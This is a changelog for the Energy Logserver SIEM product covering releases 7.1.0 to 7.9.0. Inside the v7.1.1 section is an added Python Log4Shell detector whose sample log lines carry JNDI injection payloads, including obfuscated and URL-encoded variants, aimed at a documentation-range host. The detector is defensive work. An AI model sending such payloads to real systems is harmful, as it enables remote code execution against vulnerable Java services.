Changelog
v7.9.0
NewFeatures
Empowered AI: AI Assistant - Meet “Prem”, our language model assistant
Empowered AI: AI Assistant - work with Energy AI Provider or choose local LLM as AI on Prem
Installation: Support for distributions based on Red Hat Enterprise Linux (RHEL) version 9
Integrations: Barracuda integration with dedicated dashboard and SIEM alerts
Login: The ability to limit the number of users in roles/groups (RBAC) has been introduced
new plugin: CMDB! Get a list of all sources connected to SIEM
new plugin: CRUD! CRUD indexes can work as internal database with edit and update option. Easy way to enrich SIEM with custom records.
Improvements
Agents: Introduced version checking of connected agents
Agents: Support for additional configuration files for Integrations plugin
Alert: IoC blacklists - support for End of Life (How long an IoC remains useful varies and is dependent on factors including initial confidence level, fragility, and precision)
Alert: Visibility of UI elements related to the Alerts/Quick Alert based on user role
Empowered AI: Create own AI prompts using buttons available from Discovery mode
Empowered AI: Simplified installation of Use Cases from the Empowered AI Store - added Advanced mode as an option
Index Management: Validation/User Notification: If a user sets the automatic data deletion period to less than 90 days, a warning will be displayed
Installation: The base repository is now sufficient for installation, the epel repository is no longer required
Integrations: Improved error handling when activating integration
Integrations: Unification of categories and names in Integrations and AI Store
Reports: Visibility of UI elements related to the Reports/Quick Report based on user role
Skimmer: Unification of field names in cluster monitoring metrics
Utils: configuration-backup.sh - added missing files: logserver.keystore & license files & empowered-ai configuration
Utils: logserver-password-util.sh - default passstore renamed to logserver.keystore
Utils: logserver-password-util.sh - improved error handling on missing files
Utils: logserver-password-util.sh - support for passwords with special character
BugFixes
Agents: Cleaning up unnecessary headers accumulating in the .agents index
Alert: Problem with discover_url in incidents tab
Empowered AI: AI Store - the option to select value for Rareness Threshold in advanced mode has been removed
Empowered AI: Anomaly multivariate results - the table does not reset after clicking reset/refresh
Empowered AI: API parameters escaping errors
Empowered AI: Build time frame and/or start date are set incorrectly by default
Empowered AI: Creating alert rules for text anomaly - a flat yaml file is not created with the rule
Empowered AI: Creating incidents from anomalies fix
Empowered AI: Deleting a rule forgets the page layout and search also sorting and filtering are cleared
Empowered AI: Logging of empowered-ai-realtime plugin in Network-Probe
Empowered AI: Logrotate configuration for the service (intelligence.log)
Empowered AI: Type error for limit_to_values field
Index Management: Default schedule cron pattern is incorrect in Rollover policy
Index Management: Incorrect handling of verify errors in Rollover policy and custom rules
Installation: Errors during installation due to the old cache version in sssd service
Integrations: Integration title instead of name in manifest files
Integrations: Prepareindex does not work in advanced mode
Login: Mapping for .reports and .agents has been added by default
Login: Role update for alerts and reports plugins
Network-Probe: Security fixes for dependencies: CVE-2025-6442 (webrick), CVE-2025-46727 (rack), CVE-2024-49761 (rexml)
Network-Probe: The API for verifying the status of all probes crashes when the registration documents in .networkprobes are malformed
Reports: Missing logo in .docx reports
Reports: Quick report does not take response from “pending” but from “running” state
Reports: The “origin” field in “schedulingData” blocks the creation of scheduled reports for dashboard export
SIEM Engine: GUI plugin overwrites the defaultIndex in the user config document
v7.8.0
NewFeatures
Archive: support for retention policy
Empowered AI: Online AI Store - get new models from https://energylogserver.com/ai-store/
Empowered AI: Online AI Store - integrated into Empowered AI Model Library directly from the system
Empowered AI: Online AI Store - AI model is delivered along with Alert definition
Empowered AI: Online AI Store - first Use Cases available for Netflow traffic
Network-Probe: Ability to create a new, custom pipeline from the GUI
new Plugin Integrations! Ability to manage integrations from GUI
new SIEM visualization! Live Threat Globe Map
Reports: Data Export Wizard from Discovery tab
Improvements
Alert: GUI - Default alert method set to NONE [create alert form]
Alert: GUI - Deleting multiple alerts at once
Alert: GUI - Enabled/disabled popup removed [create alert form]
Alert: GUI - Group/Category selection [create alert form]
Alert: GUI - No need to save alerts after creating/editing [create/edit alert form]
Alert: Performance - fix for Blacklist-IOC Alert Rule
Alert: Performance - size in query for aggregation in new_term rule
Alert: Playbooks - added pagination & collapse list
Empowered AI: Added a rule_name field to the results
Empowered AI: Allow aggregations only if they are smaller than the prediction time
Empowered AI: Time field taken from index pattern with the possibility of change + validation
Network-Probe: Improved misleading message when stopping/starting pipeline
Network-Probe: More filter plugins: added cybertrace, ldap, syslog filters
Network-Probe: status_refreshing_interval_seconds = 60s as default
Network-Probe: translog performance change - threshold_size:1mb, retention.age: 60s
Reports: better support for heavy overloaded systems
Reports: fully redesigned page for Data Export
Reports: saved_search support for Data Export
Reports: support for creating report for data without timestamp fields, like list of alerts
SIEM Engine: enriched application logs with the username of the person actively working in the user interface
SIEM Engine: Documentation available on main screen as link to “Knowledge Base”
SIEM Engine: logserver_auth: performance boost - synchronous API replaced by asynchronous API
BugFixes
Alert: Manual Incident from Discover incorrectly saves discover_url field
Alert: no access to the discover_url from the alert by groups other than admin
Empowered AI: improvements for Anomaly Alerts in text
Empowered AI: Dark theme fix
Empowered AI: better doc_count support
Empowered AI: Error after opening a rule in a new window when it contains special characters
Empowered AI: Improved form for field mapping
Empowered AI: No mapping for last_modified field
Empowered AI: Sorting ai.anomaly_score and rules table
Index Management: Illegal_argument_exception fix
Index Management: Prepare_index exception fix
Network-Probe: Added support for invalid registration documents
Network-Probe: Fix installation of local .gem plugins
Network-Probe: Keystore create exception fix
Network-Probe: Registration ID should only be returned after the registration document has been successfully created
Reports: Index list download for Data Export
Reports: Timeout exception when generating Report export
Reports: URL in the data export contains an incorrect address/hostname in the sent email
SIEM Engine: Data table vis applies wrong filter when sorted
SIEM Engine: logserver_auth: hanging of http response when using synchronous client
SIEM Engine: patch for CVE-2025-2401 & CVE-2025-24016
Task Management: support for universal date format
v7.7.0
NewFeatures
Alert: Wizard from Discovery tab adds possibility to create alert rules
Empowered AI: import and export mechanism of rules
Empowered AI: rules as Use Cases with Categories!
Integrations: Stormshield integration with dedicated dashboard and SIEM alerts
OVA Appliance: base image is now Oracle Linux 8
Security: force safe cipher/SSL settings for all Energylogserver components
Improvements
Login: the system gains extra stability when running under a data flood state. SIEM will stop indexing before running out of free space. The administrator will still be able to log in and clear unnecessary data.
Alert: added warning that changing a rule name affects chain and logical rules
Archive: added debug logs that will be saved by default if a task has failed with any error
Archive: added verification of the number of restored documents
Archive: changed the default archives location to /usr/share/kibana/data/archive/archives/ - breaking change
Archive: changed the way the files are recreated - added ‘Recreate missing files’ option [default: false] that verifies if all archived files exist in the archive folder path
Archive: extended the functionality of archive verification on demand - integrity is verified, as well as checksum
Archive: introduced archive.integrityCheck option [default: true] to verify the integrity of .zstd archive files at the end of the archiving task
Archive: optimized the preparation of the archiving process by checking its document counts and .zstd file size instead of always calculating checksum
Empowered AI: ability to immediately stop building/scoring
Empowered AI: ability to view AI rule while building/scoring
Empowered AI: improvements in anomaly spread graph interactions
Empowered AI: information that Univariate works on aggregations
Installation: better support for multi-node environments
Integrations: updated translate{} syntax to new format
Integrations: redesigned welcome screen
Network-Probe: clear info about actions that network probe is performing such as enabling pipelines or editing files
Network-Probe: option to create label describing probe
Network-Probe: option to navigate to pipeline’s files directly from the details section
Network-Probe: option to remove installed probe directly from the GUI - probe will be stopped as well as its services
Network-Probe: template for .networkprobes index to ensure correct mapping in case of any issues
Network-Probe: warning if probe’s local time may be misconfigured
Network-Probe: warning when probe version does not match the Energylogserver SIEM version
UBA/UEBA: new, sophisticated dashboards & documentation update
Skimmer: updated to v1.0.26
BugFixes
Alert: does not refresh aliases if roles for selected alerts are updated
Alert: fixed discover_url feature
Archive: fixed restoration of potentially corrupted archives - if any part of the file has been decompressed then an attempt will be made to upload its parts to the index
Archive: issue with not using last_archive_date from archives metadata
Empowered AI: progress bar bugfixes
Empowered AI: fixed rules get stuck in Scoring status and never end [intelligence-scheduler]
Network-Probe: fixed initialization process
Network-Probe: fixed not closing managed services when shutting down [SIEM mode]
Network-Probe: fixed time displayed in the pipeline details
Network-Probe: logging - redirected some messages to the debug, while emphasizing only the important ones
Network-Probe: management - in rare cases old documents from unregistered probes were corrupting the output of some APIs
Network-Probe: not checking pipelines statuses when logstash service is not reachable
Network-Probe: suricata upgraded to v6.0.20
Network-Probe: verification if probe is currently active and available
Reports: issues with enabling/disabling scheduled reports
v7.6.0
NewFeatures
Energy Logserver SIEM LITE - Initial step into Cyber Security
MSSP license provides transparent view to licensed sources
Sources Management: identify each source activity
UBA: SIEM module for tracking the nature of the user’s behaviour and its changes
UBA AI: predefined AI rules to detect anomalies in user behavior
Login: Introducing a new user to manage the system’s graphical interface: admin (disables logserver account)
Improvements
Alert: cross-field-correlation in Logical alert method
Alert: improved time tolerance for run_once option
Alert: mapping change to be able to search by rule name in alert_error indices
Audit: new audit selection - now includes all plugins by default
Archive: improved error handling and task resuming
Cerebro: HSTS header support
Config: configuration-backup.sh includes agent keys and siem-engine config file
Config: logserver-password-util.sh: new password management tool changes system passwords easily
Empowered AI: create rule with Saved Search or index pattern with query dsl
Empowered AI: aggregation preview for univariate rule
Empowered AI: improved model encryption
Integrations: Dell Avamar added to default integrations
Login: status-page link added to top menu
Skimmer: output addresses support lists of nodes for fault tolerance
Skimmer: support for URI schemes in config file, i.e. http, https
Skimmer: migrated to libcurl
Skimmer: updated to v1.0.25
BugFixes
Alert: adding a note to an incident doesn’t work
Alert: long_term method does not work for objects
Cerebro: fix for permissions verification
Cerebro: limit on the used HEAP memory
Empowered AI: anomalies increase by zooming in on the graph
Empowered AI: cleared placeholder in text anomaly
Empowered AI: incorrect handling of state:storeInSessionStorage
Empowered AI: name change of the axis in the charts of univariate
Empowered AI: performance tab display error for large number of fields in multivariate
Empowered AI: rareness threshold does not fill in the scheduled model
SIEM Engine: incorrect verification when diskspace thresholds are not enabled
SIEM Engine: redirect loop after session expiration
SIEM Engine: the list of domains available for logging does not refresh after changing the authorization plugin settings
SIEM Engine: cluster does not start after disabling authorization plugin
SIEM Engine: filter error messages in AuthService
SIEM Engine: task of deleting old tokens now starts automatically
Network-Probe: pipeline details are now displayed correctly
Reports: banner with information about the expiring license or the disk space visible on docx reports
Reports: fix for executing scheduled reports
Reports: visualization selection does not display all of them if there are more than 1000 of them
SIEM Engine: on_start inventories disabled by default
Task Management: show query duration
Task Management: show user matching similar query
v7.5.0
NewFeatures
Empowered AI - anomaly detection in text message - rare words probability
Empowered AI - anomaly detection in numbers
Empowered AI - anomaly detection in multi-dimensional numbers
Empowered AI - Root Cause tracing based on knowledge model
Empowered AI - Relations Mining builds knowledge model
Empowered AI - unsupervised data clustering
Empowered AI - forecasting alerting method
Empowered AI - AI input for network probe
Empowered AI - realtime processing for AI rules
Empowered AI - Model Library - save, store and upload AI models
Empowered AI - Model Library - reuse and retrain saved models
Empowered AI - Text Anomaly default alerts
Empowered AI - create manual incident based on AI results
Empowered AI - easy create alerts tab from AI rules config
Empowered AI - progress bar for started rules
BugFixes
Alert: added custom arguments to Energy SOAR integration
Alert: added support for external_link to Energy SOAR integration
Alert: groups management
Alert: missing url in alert_text arguments of the Energy SOAR method
Archive: clearing issue with empty or non-existing file metadata
Archive: scrolling in case of visible warnings
CMDB: data fetching at the plugin startup
Integrations: built-in templates now use wildcards
SIEM Engine: improved alias refresh synchronization
Network Probe: deleting config files and handling deleted files from disk
Network Probe: filtering of probe’s statuses has been fixed
Network Probe: fixed when probes’ services statuses were unavailable
Network Probe: layout improvements and readability refinements
Network Probe: updated log messages to be more comprehensible
Network Probe: fixed permissions problem with external services
Reports: improved handling of time fields
SIEM Engine: improved RBAC mapping existence verification for non-admin users
SIEM Engine: updated to v4.7.4 due to CVEs [CVE-2023-42463, CVE-2024-32038]
Task Management: improved filtering tasks by their duration
v7.4.3
NewFeatures
Query management: identify and stop long running query
Introducing Network-Probe as mandatory Input Layer
Archive: checksum verification on demand
Empowered-AI: default AI forecasting rules
License: GUI license upload with automatic distribution in cluster environment
Introducing “Status page”: showing health check in case of system problem without ability to log in
Free space warning on status and login page
Free space protection: Enabling Watermarks to keep system running in case of free space issue
Audit: enhancements to audit more GUI actions
Improvements
Alerts - Blacklist: wrong file name support
Alerts: Risk key can be set on non default field - SOAR integration
Alerts: secure and insecure webhook support
Archive: Date format change to epoch in milliseconds
Input layer uses Logstash-OSS 7.17.18
license-service: dedicated API
Skimmer: self monitoring of free space on cluster nodes
Skimmer: self monitoring of license API status
Support for Beats OSS Agents 7.17.18
BugFixes
Alerts: cannot select more than one index-pattern when creating/editing a rule
Alerts: empty role list when creating a rule without the admin role
Alerts: Energy SOAR method wrong WYSIWYG behavior
Alerts: errors when creating risks if any already exist
Alerts: Manual Incident: user without admin role cannot create an incident
Alerts: Manual Incident: user without admin role cannot see his incident
Alerts: notifications are not sent as a valid HTML email
Alerts: rule name change did not remove the old rule
Archive: partial restore
Archive: preparing data for archiving
Audit: exclusions on _nodes and _stats do not work
Audit: missing information about operations on users and roles
Audit: missing query content - if selected
Intelligence - view in discover: application not found
license-service: memory limitations
Login: AD login exception for users without mapped roles
Login: SSO login duplicate users
Reports: short link when creating docx report
SIEM Engine: Agent/Client updated to v4.5.4
SIEM Engine: permission denied after upgrade
status_page: missing branding
xlsx-import: fixing bug when writing more than 500 documents
v7.4.2
NewFeatures
Introducing Empowered-AI - Your data science module
Empowered-AI: Forecasting usecase !
Alerts: NEW rule type for Forecasting : Difference Multi Pattern - matches the difference between two index patterns calculated in a unit of time.
Archive: repository validation (automatic scan of archive files and indices)
SQL query support: query Your data with SQL query with dedicated GUI console
Integrations: NEW Labyrinth - Deception-based threat detection
Improvements
Archive: cataloging for better retention: $archivefolderpath/$year/$month
Archive: sorting, pagination and filtering on task lists
Archive: support for huge repositories
Disaster Recovery: improvements during cluster initialization and recovery
Disaster Recovery: logs for damaged indexes have been enriched with index_id
Disaster Recovery: possibility of disabling the authorization plugin
GUI: improvements in updating the client (browser) cache after Update
license-service: possibility to change log_level & default log_level changed to WARN
Reports: accept only the unix cron format in recurring reports
Reports: clear descriptions for settings which deletes obsolete files
Reports: dedicated MIME type for docx reports
Reports: filenames created by recurring reports now based on creation date
Sync: improved logging and error handling
BugFixes
Archive: delete the results file when deleting a search task
Archive: missing .zstd files and .dec files are not deleted after decryption
Archive: unable to prepare data for selected indices fix
Audit: user and role actions were filtered from audit queue due to missing username
configuration-backup & support-tool: now supports all logserver versions
E-doc: e-doc user requires gui-access to query the GUI authorization for a token
GUI: wait until refreshAliases finishes at user login
install.sh: problem with symlink when installing only the data-node
Login: deprecated route to the default home plugin
Reports: enable/disable for recurring report was not shown in GUI
Reports: impossible to delete a recurring report without assigned file
Reports: incorrect capture of “data table” and “tag cloud” visualization
Reports: incorrect formatting of email messages and the “mail” command
Reports: selected time field was not saved in the “data export” report
Reports: temporary jpeg file not deleted after creating pdf report
Reports: tsvb-based visualizations are incorrectly captured in docx reports
Scheduler: “Archive task updated, but error occured when updating scheduler object. Please retry” fix
Sync: tasks cannot be deleted
Sync: unable to create/update profile
xlsx-import: invalid file extension validation
SIEM Plan
Alerts: NEW rule type: Difference Multi Pattern - matches the difference between two index patterns calculated in a unit of time.
Alerts: bugfix: alert index rollover causes service errors
Alerts: bugfix: sorting alert risk on incident tab did not work properly
Alerts: bugfix: problem with updating alert rules
Alerts: bugfix: Energy SOAR + metric_aggregation does not create artifacts
Alerts: bugfix: Run Once old history after updating alert rule
SIEM Engine: bugfix: duplicate index-pattern siem*
v7.4.1
NewFeatures
Reports: DOCX support!
Improvements
Alert: multi-language support for alert rules
API: gui-access role is required to interact with the API
tlstool.sh: new ssl certificate management tool
BugFixes
Archive: support for “secure” and “insecure” mode (without valid certificates)
GUI: better-handled exceptions for custom plugins
GUI: defaultAppId directive has been restored
GUI: invalid directory for keystore
GUI: Module Access Control permission fix
GUI: users have aliases for different indexes after migration
Index Management: missing verification for “on save” action
Index Management: errors during rollover
Index Management: filtering using the “Enabled” column
Index Management: unable to update job after changing cron
Integrations: improved command for importing dashboards
Reports: custom logo moves the visualization on the dashboard
Reports: deleting reports (multi, single) does not refresh the list
Reports: enabling and disabling periodic reports by users
Reports: incorrect visualization titles are inserted when creating a Data Table report
Reports: long comment goes off the page when creating a PDF report
Reports: long title goes off the page when creating a PDF report
Reports: not translated statuses in the task list
Reports: problem with Tag Cloud visualization when creating PDF report
Reports: reports role paths to update, now require .reports
Scheduler: status table sorted by “start date” instead of “name”
Timeline/Timelion: regex not working due to an incorrectly built package
SIEM Plan
Alerts: bugfix: incorrect _id of the edited alert causes duplicates
Alerts: bugfix: unable to retrieve a list of risk key fields when updating a rule
SIEM Engine: better-handled exceptions in RBAC integration
CVE-2023-32002
CVE-2023-32006
CVE-2023-32559
CVE-2021-32014
CVE-2021-32012
CVE-2021-32013
CVE-2023-30533
CVE-2022-24785
CVE-2022-31129
CVE-2023-22467
CVE-2023-26115
v7.4.0
Upgrades
Complete database redefinition:
Segment replication
Searchable snapshots
Search backpressure feature can now cancel queries at the coordinator level
Complete user interface redefinition
Complete SIEM Engine redefinition:
New manager
New App
New Agent
Input layer uses Logstash-OSS 7.17.11
Support for Beats OSS Agents => 7.17.11
NewFeatures
Logserver: RBAC integration with Wazuh Engine (users can map roles between systems)
Improvements
CMDB: Browser-based Time Zone
Improved error handling when reloading a license (logserver/license/reload)
Archive: deleting tasks with multiselect option
Unification and organization of Energy Logserver system APIs
Alert: WebHook: added support for nested fields in http post payload
Agents: built-in agents templates updated to 7.17.11
BugFixes
CMDB: incorrect parsing of values in the date filter
Archive: blank line in index list on restore
v7.3.0
NewFeatures
Multi-Language Support
Improvements
Improved security by using response security headers
Network Probe: version lock prevents accidental updates
configuration-backup.sh activated by default
BugFixes
Reports: usage of “Include unmapped fields” cause “No data” when exporting csv
Agents: corrected manifest file for downloading agents
Archive: error while restoring encrypted archives
Cerebro: corrected auto-login after redirect
Integrations
VMware: Integration with dedicated dashboard and alerts
AWS: Integration with dedicated dashboard and alerts
Ruckus Networks: Integration with dedicated dashboard and alerts
Added Beats templates to beats integration
SIEM Plan
WatchGuard: Integration with dedicated dashboard and alerts
IDS Suricata: Integration with dedicated dashboard and alerts
Alerts: updated rule database with 90 new alert rules including new Windows Security Group
Alerts: bugfix: Jira integration
Alerts: bugfix: duplication of alarms in specific cases
Alerts: bugfix: top_count_keys doesn’t work properly with multiple query_keys
Alerts: bugfix: Broken Chain method TypeError
Alerts: bugfix: Exclude Fields for Logical/Chain body correlation
Alerts: NoLog rule for each alarm group
Network-Probe
Added support for sFlow - sfacctd service
Added IDS Suricata integration with dedicated dashboard and alerts
log4j - logstash-input-tcp
Required post upgrade
Recreate bundles/cache:
rm -rf /usr/share/kibana/optimize/bundles/* && systemctl restart kibana
v7.2.0
Breaking changes
Login: changed how gui access is granted for administrative users - access for any administrator has to be explicitly granted
Wiki portal renamed to E-Doc
NewFeatures
CMDB: Infrastructure - create an inventory of all sources sending data to SIEM
CMDB: Relations - ability to create relation topology map based on sources inventory
Extended auditing support - each plugin can be enabled in GUI config to save its actions in the audit index
Syntax Assistant for Alerts, Agents, Index Management, Network Probe. Check YAML definition and structure
Improvements
Update process will not override /etc/sysconfig/elasticsearch config
Clear GUI message for expired license
Agents: improved services information display for not running agents
Archive: optimization and improvements; added multi threaded processing and Task Retry support
Login: redesigned audit selection and exclusion settings GUI
Reports: tasks edit is now more robust and allows modification of advanced parameters
Reports: moved settings into new Config tab in the plugin from Config -> Settings
Alerts: loading new alarm Rule Set during update process [install.sh]
Beats: updated to v7.17.8
Skimmer: negotiate highest TLS1.3 version if possible
Skimmer: fixes regarding ssl connection
Skimmer: added elasticsearch_ssl config option
Skimmer: added new metric: node_stats_fs_total_free_in_pct
Skimmer: updated to v1.0.22
Elasticdump updated to v6.79.4
BugFixes
Refreshing audit exclusions caused ELS node to freeze in rare cases
Update process on RedHat 7.9 could not be run caused by missing package
LDAP login: improved validation on username input
Table visualization: fix for “Count percenteges”, which was inaccurate in some cases
Skimmer: sometimes did not start after installation
Agents: small GUI improvements
Alerts: long alert names presented outside the frame
Alerts: sorting alert risk on incident tab did not work properly
Intelligence: malware scanners would raise a false positive on one of the plugin dependencies
Reports: data export (csv) improvements on file integrity
Reports: a rare case of a race condition when removing temporary directories
E-Doc: improvements to https handling when using Elasticsearch as a search engine
install.sh: installation process always uses LC_ALL=C
Integrations
Added new integrations: FireEye, Infoblox, ArcSight Common Event Format
SIEM Plan
Agents: SIEM agents updated to 3.13.6
Alerts: new notification methods: ServiceNow, WebHook, TheHive, Jira
Alerts: risk values on incident tab formatted for clarity
Alerts: example description supplied with new values regarding escalate and recovery
Alerts: all alerts in a group can be seen with a proper row selection
Alerts: creating risks is now supported on no time based indices
Alerts: long alert names presented outside of message frame
Alerts: on incident tab sorting by risk did not work properly
Alerts: added Ransomware Detection rules
Network-Probe
Increased tolerance for status/verification calls
Security related
axios - CVE-2021-3749
qs - CVE-2022-24999
express - CVE-2022-24999
moment - CVE-2022-24785
moment - CVE-2022-31129
minimist - CVE-2021-44906
char.js - CVE-2020-7746
async - CVE-2021-43138
requestretry - CVE-2022-0654
xmldom - CVE-2022-39353
underscore - CVE-2021-23358
flask-cors - CVE-2020-25032
kibana - CVE-2022-23707
Required post upgrade
Recreate bundles/cache:
rm -rf /usr/share/kibana/optimize/bundles/* && systemctl restart kibana
Wiki portal renamed to E-Doc: if data migration is required follow the steps of UPGRADE.md
v7.1.3
Security related
log4j updated to 2.19.0
kafka updated to 2.13-3.3.1 (log4j dependency removed)
logstash: removed obsolete bundled jdk
v7.1.2
NewFeatures
Energy SOAR: Redesigned and improved integration (Security Orchestration, Automation And Response)
Intelligence: Redesigned and improved Forecasting [experimental]
Masteragent: New feature: Configuration Templates
New plugin: CMDB - simple implementation of Configuration Management Database
Improvements
es2csv - Performance boost and Memory optimization
Reports: Support for large report files
Redirection of HTTPS connection to GUI enabled by default - 443 => 5601
Login: Home Page moved to Integrations Page
diagnostic-tool.sh - Added logstash logs
Elasticsearch: Global timeouts changed to 60s
Updated LICENSE in all components
Index Management: Prepare index has been moved from Config to Index-Management tab
Masteragent: Setting authorization with a client certificate by default
Masteragent: Possibility to fully disable the HTTP server on masteragent clients
BugFixes
Login: Fixed problems with sharing Short Links
Discovery: Fixed problem with index-patterns name overlapping
Index Management: Fixed execution time for built-in logtrail policies
Masteragent: Fixed error when getting installed services
Integrations
windows-ad: Fixed error in Ad Accounts dashboard
beats - Fixes in waf ruby filter
SIEM Plan
Vectra.AI: Integration with dedicated dashboard and alerts
MITRE added to SIEM Dashboard
Agents: SIEM agents updated to 3.13.4
Agents: Vulnerability detection & feeds enabled by default
Alert: Simplified discover_url feature
Alert: theHive project - Improved integration
Alert: Fixed exception for risk query
Alert: SIEM alert group changed to “Correlated”
Alert: Fixed problem with TypeError: deprecated_search()
Alert: Fixed logs problem after rotating the file
Alert: Fixed permission problem in Run Once mode
Alert: Fixed indentation in query_string
[bugfix] Added missing library to Qualys Quard venv
[bugfix] Added missing ports 1514udp-tcp/1515tcp to install.sh
Required post upgrade
Recreate bundles/cache:
rm -rf /usr/share/kibana/optimize/bundles/* && systemctl restart kibana
(SIEM only) Update/ReImport SIEM Dashboard for MITRE
v7.1.1
NewFeatures
Elasticsearch Join support - API level query
Improvements
es2csv - Breakthrough (50%) performance boost
es2csv - Renamed to els2csv
diagnostic-tool.sh - Added logs encryption
diagnostic-tool.sh - Renamed to support-tool.sh
Skimmer: Indices_stats: run only on master node
Skimmer: Added two metrics: indices_stats_patterns and indices_stats_regex
Skimmer: Added cached info about nodes when poll errors out
Logtrail: Disabled ratelimit in rsyslog for logtrail source files
Logtrail: Parsing in pipeline for alert,kibana,elasticsearch,logstash [added standardized log_level field]
Logtrail: Added default filter showing only errors [“NOT log_level: INFO”]
Index Management: Added built-in index policies for common actions
Discovery: Default QueryLanguage changed to Lucene
Cerebro updated to v0.9.4
Curator updated to v5.8.4
Elasticdump updated to v6.79.4
Wiki.js updated to v2.5.274
BugFixes
Login: In case of unsuccessful login information about “redirection” is lost when using link sharing
Login: When logging using SSO auth, it doesn’t redirect when using link sharing
Login: Fixed “unable to parse url” when using link sharing
Login: Corrected Session expired message
Login: gui-access role added to role-mappings.yml
Login: When logging using SSO auth, sending the entered password as a default action
Skimmer: Index store value of _cat/shards in bytes
Skimmer: Disabled ssl handshake on logstash api
Logtrail: Corrected syntax highlighting
Logtrail: Fixed filter selector on columns
Discovery: Fixed timeout handling
Wiki: Removed gui-access group
Index Management: Wait for updates before refreshing the list
Index Management: Fixed id problem during custom update
Integrations
windows-ad/beats: fixed error in ruby{} filter
netflow - Fixes from 7.1.0
netflow - network_vis - Fixed incorrect filtering
netflow - network_vis - Added new option “skip null values”
syslog-mail - Fixes from 7.1.0
SIEM Plan
Added Log4j RCE attacks to Detection Rules [“Wazuh alert [HIGH] - rule group: custom - Log4j RCE”]
Alert: Fixed problem with modifying alertrulemethod
Alert: Fixed malfunction of Test Rule in case of “verify_certs: false” setting
Alert: Simplified Discovery URL
Alert: Logtrail - Cluster Services Error Logs added to Cluster-Health group
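The SIEM Plan entry above adds a "Log4j RCE" detection rule, but the rule itself is not reproduced on this page. The block below is an added example, not the product's rule or code: it shows the core of such a detection for Log4Shell (CVE-2021-44228) probes, undoing the URL-encoding and nested-lookup obfuscations attackers used and flagging any line that still carries a `${jndi:` lookup. The access-log lines, addresses and paths are constructed, and the lookup-evaluation semantics are an assumption of the example.

```python
import re
from typing import List, Optional
from urllib.parse import unquote

# Innermost ${...} lookup: nothing nested inside it.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# Canonical form we want to end up with: ${jndi:<scheme>:...}
_JNDI = re.compile(r"\$\{jndi:(?P<scheme>[a-z]+):", re.IGNORECASE)


def _collapse(match) -> str:
    """Replace one inner lookup by the literal it evaluates to.

    Assumed Log4j 2 lookup semantics (illustrative, not the product's code):
      ${lower:j} / ${upper:j}    -> "j"  (last ':'-separated segment)
      ${::-j} / ${env:NOPE:-j}   -> "j"  (":-" introduces a default value)
    A ${jndi:...} lookup is kept untouched, because that is what we detect.
    """
    body = match.group(1)
    if body.lower().startswith("jndi:"):
        return match.group(0)
    if ":-" in body:
        return body.split(":-", 1)[1]
    return body.rsplit(":", 1)[-1]


def normalize(line: str) -> str:
    """Undo URL-encoding and nested-lookup obfuscation until nothing changes."""
    text = unquote(unquote(line))  # two passes catch double-encoded payloads
    while True:
        collapsed = _INNER.sub(_collapse, text)
        if collapsed == text:  # only jndi lookups (or none) are left
            return collapsed
        text = collapsed  # every replacement shortens the string, so this terminates


def detect_log4shell(line: str) -> Optional[dict]:
    """Return an alert dict for a line carrying a JNDI lookup, else None."""
    norm = normalize(line)
    m = _JNDI.search(norm)
    if m is None:
        return None
    end = norm.find("}", m.start())
    payload = norm[m.start():end + 1] if end != -1 else norm[m.start():]
    return {"scheme": m.group("scheme").lower(), "payload": payload, "raw": line}


def scan(lines) -> List[dict]:
    """Run the detector over an iterable of log lines and keep the hits."""
    return [a for a in (detect_log4shell(l) for l in lines) if a]


# Constructed web-server access-log lines (not real traffic).
SAMPLE_LINES = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:03 +0000] "GET /?x=${${lower:j}${upper:n}di:${lower:r}mi://198.51.100.7/b} HTTP/1.1" 400 0',
    '10.0.0.9 - - [10/Dec/2021:12:00:04 +0000] "GET /?q=%24%7Bjndi%3Adns%3A%2F%2F198.51.100.7%2Fc%7D HTTP/1.1" 200 12',
    '10.0.0.9 - - [10/Dec/2021:12:00:05 +0000] "GET /?q=${env:HOME} HTTP/1.1" 200 12',  # a lookup, but not JNDI
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_LINES):
        print(f"[HIGH] Log4j RCE probe via {alert['scheme']}: {alert['payload']}")
```

The normalisation step is what separates a useful rule from a plain `${jndi:` string match: the second and third sample lines never contain that literal, yet both resolve to it once the inner lookups and the percent-encoding are stripped.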
Security related
http-proxy - CVE-2022-0155
xlsx - CVE-2021-32013
json-schema - CVE-2021-3918
lodash - CVE-2021-23337
pdf-image - CVE-2020-8132
angular-chart.js - CVE-2020-7746
pyyaml - CVE-2020-14343
cryptography - CVE-2020-25659
aws-sdk - CVE-2020-28472
nodemailer - CVE-2020-7769
objection - CVE-2021-3766
socket.io - CVE-2020-28481
nodejs - CVE-2021-44531
v7.1.0
NewFeatures
Added support for AlmaLinux and RockyLinux
Agents: Added local repository with GUI download links for agents installs
Archive: Added ‘Run now’ for scheduled archive tasks
Archive: Added option to enable/disable archive task
Archive: Added option to encrypt archived data
Audit: Added report of non-admin user actions in GUI
Elasticsearch: Added field level security access control for documents
Kibana: Added support for Saved Query object in access management
Kibana: Added support for TLS v1.3
Kibana: Added new plugin Index Management - automate index retention and maintenance
Reports: Added new report type created from data table visualizations - allows creating a report like a table visualization including all records (paginated, split into pages)
Reports: Added option to specify report task name which sets destination file name
Improvements
Security: log4j updated to address vulnerabilities: CVE-2021-44228, CVE-2021-45046, CVE-2021-45105, CVE-2021-44832, CVE-2021-4104
Added new directives for LDAP authentication
Agents: Changed agent’s action name from drop to delete
Archive: Improvement and optimization of “resume” feature
Archive: Optimised the archiving process by saving data directly to a zstd file
Archive: Multiple ‘Upload’ GUI improvements
Archive: Improved logs verbosity
Audit: Added template for audit index
Beats: Updated to v7.12.1
Curator: Added curator logs for rotation
Elasticsearch: Extended timeout for starting service
Elasticsearch: Updated engine to v7.5.2
install.sh: Improved update section for better handling of services restart
Kibana: Updated engine to v7.5.2
Kibana: Clean SSL info in logs
Kibana: Improved built-in roles
Kibana: Disabled telemetry
Kibana: Set Discovery as a default app
Kibana: Optimized RPM
Kibana: Improved handling of unauthorized access in Discovery
Kibana: small changes in UI - Improved Application RBAC, product version
Kibana: Added new logos
Kibana: Improved login screen, unauthorized access info
Kibana: Restricted access to specific apps
Kibana: Added option to configure default app
Logrotate: Added Skimmer
